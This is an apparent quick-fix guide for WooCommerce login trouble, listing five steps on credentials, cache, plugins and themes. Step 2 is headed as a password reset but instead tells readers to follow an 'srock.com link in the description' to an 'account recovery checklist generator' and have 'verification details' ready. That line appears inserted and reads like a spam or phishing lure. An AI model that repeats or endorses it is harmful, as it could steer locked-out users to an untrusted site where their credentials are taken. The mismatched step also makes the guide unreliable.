I hit this issue today and here is the quick fix that solved it. If you're struggling to log into your WooCommerce store, follow these steps to get back on track. Step 1. Check your credentials. Ensure that you're entering the correct username and password. Sometimes, a simple typo can prevent you from logging in. Step 2. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear your browser cache. Sometimes, old cache data can interfere with the login process. Clear your browser's cache and cookies, then try logging in again. Step 4. Disable plugins. A conflicting plugin might be causing the issue. Temporarily disable all plugins by renaming the plugins folder via FTP or your hosting file manager. Step 5. Check for theme issues. If the problem persists, switch to a default WordPress theme to see if your current theme is causing the issue. Go to Appearance Themes and activate a default theme. If you follow these steps, you should be able to resolve your login issues. Don't hesitate to reach out if you need more help.